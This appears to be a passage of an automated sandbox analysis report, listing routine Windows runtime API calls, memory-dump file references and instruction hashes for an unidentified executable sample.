                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006279BF
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006279CA
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0536513e3a05e6d01ddfc8efb6b6cdad3f24ee5380682df7de73d6e7adf8fc86
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7dcce74ecb8a01fa79a73ee7309228ad071d97ecfd2842c70d2c3e2e81159c8e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0536513e3a05e6d01ddfc8efb6b6cdad3f24ee5380682df7de73d6e7adf8fc86
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8401621024CBD415E3716B788C19B8E9A833F437ABF064A99D1ED1C1D66BA411819A53
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285A2
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285AD
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285B8
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285C3
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285CE
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285D9
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285E4
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285EF
                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006285FA
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce5ad002c9eac29fdc3297e591c649c31669932d28d2c4c48ad88680413af2be
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 74c19268881914b5c42930087aba420d1f711aadc7077aefcee9ffdbdb27a6eb
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce5ad002c9eac29fdc3297e591c649c31669932d28d2c4c48ad88680413af2be
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D01D61024CBC019E3717B788C18B8E9A833F837EBF074A8CD1ED2C1C66FA411419953
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00715CE2,00000104), ref: 006968AC
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\q
                                                                                                                                                                                                                                                                                                                  • API String ID: 514040917-472284796
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e059e70b2b9732ce602b83c40f44d015e6c02fc5415b3464a192ff14f890b2f5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 507b53a305d064961f20972cfd6c5cd8cde08086eda3313bf7ade667d4f38d7f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e059e70b2b9732ce602b83c40f44d015e6c02fc5415b3464a192ff14f890b2f5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41216732A4031777EB246A28DD46FEB375F8BD1744B09403EFE08E6681F665CA90C1E9
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00652016
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 006520A4
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00652116
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00652130
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00652193
                                                                                                                                                                                                                                                                                                                  • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 006521B0
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2984826149-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0469da383b665a4a6a141b53ed48887e4f69cfe4e9dcc0eb5f15e4130c4baa6c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 13774a5599c0ff8fad7e05aa130023e00b10a2daaef94d06057f205b343e3783
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0469da383b665a4a6a141b53ed48887e4f69cfe4e9dcc0eb5f15e4130c4baa6c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F71E572A0020B9BDF219FA4CC65AEF7BB7EF4A352F184019EE05A7290D735C849C760
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00632A79
                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 00632AE4
                                                                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00632B01
                                                                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00632B40
                                                                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00632B9F
                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00632BC2
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 152c838fc8f623c0854a1504914d770c90f443f31c95d7817f4bd140f0624cf0
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e20915cd681452a0579cba6d57e5b2ef7ecd988ae18c7b0e39eee6e73d46ad23
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 152c838fc8f623c0854a1504914d770c90f443f31c95d7817f4bd140f0624cf0
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7651D072A0021BAFDB209F64CC55FEABBBAEF44754F148428F906A6290D734CD41CBA4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D012
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D02F
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D050
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D0D3
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D117
                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0062D15D
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c58a8ed5c54cae815eb901f93b25a3dcb3baac5bab95fa80fed149a7aa73d83
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e7848599da13a3efc79e03291350f2c1e0cca7ca8eabee1dd0a08ab9298d80c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c58a8ed5c54cae815eb901f93b25a3dcb3baac5bab95fa80fed149a7aa73d83
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59519131900A25CFCF10DF28E9859E9B7B2FF08750B258499E846EB691C734ED42CF95
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FF670357,?,?,00000000,006C4A65,000000FF,?,006982E0,?,?,0069828F,?), ref: 006983B2
                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006983C4
                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,006C4A65,000000FF,?,006982E0,?,?,0069828F,?), ref: 006983E6
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                  • Opcode ID: fe8d5563346a0cc837e907c7ffc6fad4008c03b75f27818704ddc96188957f61
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 49df9224d8eaace89368dc65ce80d010857eb833383698c97b8689f934c77b53
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe8d5563346a0cc837e907c7ffc6fad4008c03b75f27818704ddc96188957f61
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7901A231A54619BFDB018F94DC05FFEBBB9FB44B11F008529E821A26D0DB789900CA94
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,006A19CA), ref: 006A1A3D
                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,006A19CA), ref: 006A1A47
                                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 006A1A85
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506046644.00000000006E1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506098834.0000000000712000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506629637.0000000000714000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2506885951.0000000000715000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.0000000000717000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2507165628.000000000071A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_610000_4888.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-537541572
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 63c9642337adb6fe4a4f14d13c024e198c227402f7b2f85927044050f85ace5a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2674f09f40a3a90ff0400ffa5c98ad5b89154cadf5410a25d5603a3252ce83db
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63c9642337adb6fe4a4f14d13c024e198c227402f7b2f85927044050f85ace5a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F03730784249B7EB606F65EC06FA93EA7AB52B50F548024FA0CAC1E1E766DD50D944
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2505629954.000000000061F000.00000020.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505578000.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.0000000000611000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.000000000061C000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505629954.00000000006C1000.00000020.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2505990969.00000000006C8000.00000002.00000001.01000000.00000007.sdmpDownload File
